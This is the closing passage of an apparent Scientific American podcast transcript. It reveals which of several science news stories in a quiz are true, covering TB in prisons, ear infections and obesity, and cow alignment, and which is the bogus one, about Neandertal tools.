A study just reported in the August 26th edition of the Proceedings of the National Academy of Sciences finds that the rise in prison populations in post communist countries accounts for 60 percent of new TB cases as well as a significant share of multidrug - resistant TB .
Story number 4 is true .
Chronic ear infections in infancy may be linked to adult obesity .
Because ear infections can damage a nerve that passes through the middle ear and controls taste sensation , which may intensify the desire for fatty or high - calorie foods .
The study was announced at a meeting of the American Chemical Society .
And story number 2 is true .
An analysis of Google Earth images finds that most cows stand aligned with the Earth 's magnetic poles .
We milked this story further in the August 26th episode of the daily SciAm podcast , 60 - Second Science .
All of which means that story number 3 about Neandertal stone tools being inferior to Homo sapiens is TOTALL ....... Y BOGUS .
Because a new study in the Journal of Human Evolution finds that Neandertal tools were every bit as good as our own .
Although nobody had yet invented bits .
( music )
Well that 's it for this edition of the weekly SciAm podcast .
Visit www.SciAm.com to check out Merrill Goozner 's reporting on TB from Russia .
You can write to us at podcast@SciAm.com .
For Science Talk , the weekly podcast of Scientific American , I'm Steve Mirsky .
Thanks for clicking on us .
